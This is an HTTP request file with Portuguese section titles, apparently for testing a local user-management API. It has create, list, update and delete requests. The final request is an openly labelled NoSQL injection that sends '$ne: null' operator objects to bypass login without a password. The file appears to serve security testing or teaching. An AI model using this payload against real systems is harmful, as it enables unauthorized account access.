### Criar novo usu치rio
POST http://localhost:3000/api/users
Content-Type: application/json

{
  "username": "Maria",
  "email": "maria@email.com",
  "password": "11111"
}


### Listar todos os usu치rios
GET http://localhost:3000/api/users


### Atualizar usu치rio
PUT http://localhost:3000/api/users/<ID_DO_USUARIO>
Content-Type: application/json

{
  "email": "novoemail@email.com"
}


### Deletar usu치rio
DELETE http://localhost:3000/api/users/<ID_DO_USUARIO>


### NoSQL Injection - Tentativa de login sem saber a senha
POST http://localhost:3000/api/login
Content-Type: application/json

{
  "username": { "$ne": null },
  "password": { "$ne": null }
}
